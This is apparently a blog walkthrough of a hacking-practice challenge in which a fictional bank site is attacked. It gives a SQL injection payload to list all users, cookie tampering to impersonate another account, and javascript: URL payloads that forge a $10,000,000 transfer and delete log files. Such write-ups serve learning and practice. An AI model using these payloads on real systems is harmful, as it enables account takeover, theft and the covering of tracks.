Cookie Injection,Java Script Injection & Sql Injection Method


From the navigation and source code of pages, we gather following information:

Description Page Fields
Register pages Register.php > register2.php
  • <input type=”text” name=”username” maxlength=10>
  • <input type=”password” name=”password” maxlength=50>
  • <textarea name=”desc” rows=5 cols=20 maxlength=255>
Login pages login1.php > login2.php
  • <input type=”text” name=”username” value=”Enter Username”>
  • <input type=”password” name=”Password” value=””>
Purge files cleardir.php <input type=’hidden’ name=’dir’ value=’loginSQLFiles’>
Transfer money from one account to another movemoney.php
  • <input type=’text’ name=’TO’ value=’Username To Give Money To’>
  • <input type=’text’ name=’AMOUNT’ value=’Amount Of Money To Move’>

Authentication cookie (created after successful authentication):

  • accountUsername=<login>
  • accountPassword=<password>

Our target:

  • Name: Garry Hunter
  • Transfer $10,000,000 into the account dropCash.
  • Log directory: logFiles

Objective 1: Find the account of Gary Hunter

First create your own account and log in. Once done, type following command in the url bar: javascript:alert(document.cookie); It shows our cookie value, indicating that the site is vulnerable. Then connect to user info page and enter a SQL injection to show the list of all users: ‘ or ‘a’=’a.

By scrolling down, we find:

GaryWilliamHunter : — $$$$$ —

The 2 values are separated by a colon:

  • Before colon: the login (GaryWilliamHunter)
  • After colon: the description (– $$$$$ –)

Objective 2: Move the $10,000,000 into the account dropCash

By entering following code in the URL, we see that the site is vulnerable to cookie injection because it displays in clear cookie information.


Install Firebug and Firecookie for Firefox. We then have to change value of cookie named “accountUsername” to “GaryWilliamHunter” and use following JS injection (copy/paste in the URL):

javascript:void(document.write(‘<form method=post action=movemoney.php><input type=hidden name=TO value=dropCash /><input type=hidden name=AMOUNT value=10000000 /><input type=submit value=transfer /></form>’))

It will dynamically write a form on the page, containing necessary values for a transfer:

  • FORM ACTION: movemoney.php, as specified in the exercise
  • FROM: value taken from the modified cookie (GaryWilliamHunter)
  • TO: value of dropCash, as stated in the exercise. We know this field from the information we gathered.
  • AMOUNT: value specified in the exercise. We know this field from the information we gathered.

By validating the form, it will complete the stage.

Objective 3: Clear The Logs, They’re held in the folder ‘logFiles’

Copy/paste following code in the URL:

javascript:void(document.write(‘<form method=post action=cleardir.php><input type=hidden name=dir value=logFiles /><input type=submit value=”cover my tracks” /></form>’))

PS: You can also use the Firefox add-on “Tamper Data” or Google Chrome’s “Inspect Element” option instead of Firecookie and Firebug.

About the Author

Aloha, I'm Amit Ghosh, a web entrepreneur and avid blogger. Bitten by entrepreneurial bug, I got kicked out from college and ended up being millionaire and running a digital media company named Aeron7 headquartered at Lithuania.

Related Posts

Basic Mission 1   I can call you a pretty dumb as per you are now viewing the walkthrough for...

Basic Mission 2   I can again call you a pretty dumb as per you are now again viewing the walk...

Basic Mission 3   Have a look at the source code of that page and have you noticed the form section?...

Leave a Reply